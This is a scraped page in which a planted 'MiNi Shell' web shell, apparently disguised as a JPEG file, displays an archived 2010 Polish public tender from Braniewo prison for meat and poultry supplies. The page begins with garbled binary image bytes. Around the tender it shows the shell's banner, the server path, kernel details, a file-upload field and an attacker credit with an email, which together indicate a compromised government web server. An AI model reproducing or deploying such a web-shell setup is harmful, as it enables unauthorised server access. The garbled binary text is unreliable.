JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100429/120250-N-2010.html

<p class="kh_header"><b>Braniewo: Postępowanie o udzielenie zamówienia publicznego na dostawy mięsa, drobiu i wyrobów wędliniarskich.</b><br>
<b>Numer ogłoszenia: 120250 - 2010; data zamieszczenia: 29.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Braniewie , Plac Grunwaldu 2a, 14-500 Braniewo, woj. warmińsko-mazurskie, tel. 055 2440700, faks 055 2441020.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na dostawy mięsa, drobiu i wyrobów wędliniarskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są bieżące dostawy mięsa, drobiu i wyrobów wędliniarskich do bloku żywnościowego Zakładu Karnego w Braniewie od dnia 10.06.2010r. przez okres 12 miesięcy. Wykonawca nie może powierzyć realizacji zamówienia podwykonawcy.

Część I Wyroby wędliniarskie

Asortyment,
Szacunkowa roczna Ilość [kg],
Polska norma,
Kod CPV

1
Blok drobiowy
420 kg
PN-A-86526
15131135-0
2
Mielonka śniadaniowa
150 kg
PN-A-82007
15131133-6
3
Golonka prasowana
60 kg
PN-A-82007
15131133-6
4
Kaszanka
430 kg
PN-86/A-82004
15131120-2
5
Kiełbasa parówkowa drobiowa
230 kg
PN-A-86526
15131135-0
6
Kiełbasa biała parzona 
185 kg
PN-A-82007
15131130-5
7
Kiełbasa drobiowa
660 kg
PN-A-86526
15131135-0
8
Kiełbasa moratdela
600 kg
PN-A-82007
15131130-5
9
Kiełbasa parówkowa 
785 kg
PN-A-82007
151311120-2
10
Kiełbasa zwyczajna 
1600 kg
PN-A-82007
15131130-5
11
Konserwa mięsna 300g
360 kg
PN-A-82022
15131000-5
12
Metka łososiowa
380 kg
PN-86/A-82004
15131100-6
13
Pasztetowa
545 kg
PN-86/A-82004
15131120-2
14
Pieczeń rzymska
215 kg
PN-86/A-82004
15131120-2
15
Podgardle wędzone
165 kg
PN-A-82007
15131220-3
16
Poledwiczka drobiowa
70 kg
PN-A-86526
15131135-0
17
Salceson ozorkowy
100 kg
PN-86/A-82004
15131120-2
18
Salceson biały
115 kg
PN-86/A-82004
15131120-2
19
Szynka konserwowa drobiowa
125 kg
PN-A-86526
15131135-0
20
Szynka konserwowa wieprzowa
150 kg
PN-A-82007
15131410-2
21
Smaczek konserwowy
100 kg
PN-A-82007
15131410-2
22
Serdelki z indyka
380 kg
PN-A-82007
15131135-0
23
Pasztet drobiowy konserwa 100g
80 kg
PN-A-82022
15131000-5

Część II Mięso

Asortyment
Szacunkowa, roczna
Ilość [kg]
Polska norma
Kod CPV

1
Wątroba wieprzowa
200 kg
PN-86/A-82004
15114000-0
2
Półtusze wieprzowe kl.R
1200 kg
PN-A-82007
15113000-3
3
Mięso gulaszowe wołowe
100 kg
PN-A-86526
15111000-9


Część III Drób

Asortyment
Szacunkowa, roczna
Ilość [kg]
Polska norma
Kod CPV

1
Kurczak cały świeży
600 kg
PN-A-86524 
15112130-6
2
Serca drobiowe
100 kg
PN-A-86523
15114000-0 
3
Wątróbki drobiowe
200 kg
PN-A-86523
15114000-0.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki:
 1.Spełniają warunki określone w art.. 22 ust. 1 Ustawy dotyczące.:
- Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-  Posiadania wiedzy i doświadczenia  
-  Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
-  Sytuacji ekonomicznej i finansowej 
2. Nie zalegają z opłatami podatków oraz składek na ubezpieczenia społeczne i zdrowotne;
3. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 oraz 2 Ustawy Prawo zamówień publicznych (tekst jedn. z dnia 20 listopada 2007 Dz. U. Nr 223, Poz. 1655,  z 2008 r. Nr 171, Poz. 1058, Nr 220 Poz. 1420, Nr 227 Poz. 1505; z 2009 Nr 19 Poz. 101, Nr 65 Poz. 545, Nr 91 Poz. 742, Nr 157 Poz. 1241, nr 206 Poz. 1591, Nr 223 Poz. 1778).

Sposób oceny spełniania warunków
1. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. VI SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki:
 1.Spełniają warunki określone w art.. 22 ust. 1 Ustawy dotyczące.:
- Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-  Posiadania wiedzy i doświadczenia  
-  Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
-  Sytuacji ekonomicznej i finansowej 
2. Nie zalegają z opłatami podatków oraz składek na ubezpieczenia społeczne i zdrowotne;
3. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 oraz 2 Ustawy Prawo zamówień publicznych (tekst jedn. z dnia 20 listopada 2007 Dz. U. Nr 223, Poz. 1655,  z 2008 r. Nr 171, Poz. 1058, Nr 220 Poz. 1420, Nr 227 Poz. 1505; z 2009 Nr 19 Poz. 101, Nr 65 Poz. 545, Nr 91 Poz. 742, Nr 157 Poz. 1241, nr 206 Poz. 1591, Nr 223 Poz. 1778).

Sposób oceny spełniania warunków
1. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. VI SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki:
 1.Spełniają warunki określone w art.. 22 ust. 1 Ustawy dotyczące.:
- Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-  Posiadania wiedzy i doświadczenia  
-  Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
-  Sytuacji ekonomicznej i finansowej 
2. Nie zalegają z opłatami podatków oraz składek na ubezpieczenia społeczne i zdrowotne;
3. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 oraz 2 Ustawy Prawo zamówień publicznych (tekst jedn. z dnia 20 listopada 2007 Dz. U. Nr 223, Poz. 1655,  z 2008 r. Nr 171, Poz. 1058, Nr 220 Poz. 1420, Nr 227 Poz. 1505; z 2009 Nr 19 Poz. 101, Nr 65 Poz. 545, Nr 91 Poz. 742, Nr 157 Poz. 1241, nr 206 Poz. 1591, Nr 223 Poz. 1778).

Sposób oceny spełniania warunków
1. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. VI SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki:
 1.Spełniają warunki określone w art.. 22 ust. 1 Ustawy dotyczące.:
- Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-  Posiadania wiedzy i doświadczenia  
-  Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
-  Sytuacji ekonomicznej i finansowej 
2. Nie zalegają z opłatami podatków oraz składek na ubezpieczenia społeczne i zdrowotne;
3. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 oraz 2 Ustawy Prawo zamówień publicznych (tekst jedn. z dnia 20 listopada 2007 Dz. U. Nr 223, Poz. 1655,  z 2008 r. Nr 171, Poz. 1058, Nr 220 Poz. 1420, Nr 227 Poz. 1505; z 2009 Nr 19 Poz. 101, Nr 65 Poz. 545, Nr 91 Poz. 742, Nr 157 Poz. 1241, nr 206 Poz. 1591, Nr 223 Poz. 1778).

Sposób oceny spełniania warunków
1. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. VI SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający następujące warunki:
 1.Spełniają warunki określone w art.. 22 ust. 1 Ustawy dotyczące.:
- Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
-  Posiadania wiedzy i doświadczenia  
-  Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
-  Sytuacji ekonomicznej i finansowej 
2. Nie zalegają z opłatami podatków oraz składek na ubezpieczenia społeczne i zdrowotne;
3. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 oraz 2 Ustawy Prawo zamówień publicznych (tekst jedn. z dnia 20 listopada 2007 Dz. U. Nr 223, Poz. 1655,  z 2008 r. Nr 171, Poz. 1058, Nr 220 Poz. 1420, Nr 227 Poz. 1505; z 2009 Nr 19 Poz. 101, Nr 65 Poz. 545, Nr 91 Poz. 742, Nr 157 Poz. 1241, nr 206 Poz. 1591, Nr 223 Poz. 1778).

Sposób oceny spełniania warunków
1. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, opisanych w pkt. VI SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, że Wykonawca spełnia wymienione warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. 
Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie- załączniki nr3 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Braniewie
ul. Pl. Grunwaldu 2A
14-500 Braniewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 10:00, miejsce: Zakład Karny w Braniewie 
14-500 Braniewo
ul. Pl. Grunwaldu 2A. 
lub w sekretariacie Zakładu Karnego w Braniewie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyroby wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment
Szacunkowa, roczna
Ilość [kg]
Polska norma
Kod CPV

1
Blok drobiowy
420 kg
PN-A-86526
15131135-0
2
Mielonka śniadaniowa
150 kg
PN-A-82007
15131133-6
3
Golonka prasowana
60 kg
PN-A-82007
15131133-6
4
Kaszanka
430 kg
PN-86/A-82004
15131120-2
5
Kiełbasa parówkowa drobiowa
230 kg
PN-A-86526
15131135-0
6
Kiełbasa biała parzona 
185 kg
PN-A-82007
15131130-5
7
Kiełbasa drobiowa
660 kg
PN-A-86526
15131135-0
8
Kiełbasa moratdela
600 kg
PN-A-82007
15131130-5
9
Kiełbasa parówkowa 
785 kg
PN-A-82007
151311120-2
10
Kiełbasa zwyczajna 
1600 kg
PN-A-82007
15131130-5
11
Konserwa mięsna 300g
360 kg
PN-A-82022
15131000-5
12
Metka łososiowa
380 kg
PN-86/A-82004
15131100-6
13
Pasztetowa
545 kg
PN-86/A-82004
15131120-2
14
Pieczeń rzymska
215 kg
PN-86/A-82004
15131120-2
15
Podgardle wędzone
165 kg
PN-A-82007
15131220-3
16
Poledwiczka drobiowa
70 kg
PN-A-86526
15131135-0
17
Salceson ozorkowy
100 kg
PN-86/A-82004
15131120-2
18
Salceson biały
115 kg
PN-86/A-82004
15131120-2
19
Szynka konserwowa drobiowa
125 kg
PN-A-86526
15131135-0
20
Szynka konserwowa wieprzowa
150 kg
PN-A-82007
15131410-2
21
Smaczek konserwowy
100 kg
PN-A-82007
15131410-2
22
Serdelki z indyka
380 kg
PN-A-82007
15131135-0
23
Pasztet drobiowy konserwa 100g
80 kg
PN-A-82022
15131000-5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment
Szacunkowa, roczna
Ilość [kg]
Polska norma
Kod CPV

1
Wątroba wieprzowa
200 kg
PN-86/A-82004
15114000-0
2
Półtusze wieprzowe kl.R
1200 kg
PN-A-82007
15113000-3
3
Mięso gulaszowe wołowe
100 kg
PN-A-86526
15111000-9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asortyment
Szacunkowa, roczna
Ilość [kg]
Polska norma
Kod CPV

1
Kurczak cały świeży
600 kg
PN-A-86524 
15112130-6
2
Serca drobiowe
100 kg
PN-A-86523
15114000-0 
3
Wątróbki drobiowe
200 kg
PN-A-86523
15114000-0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com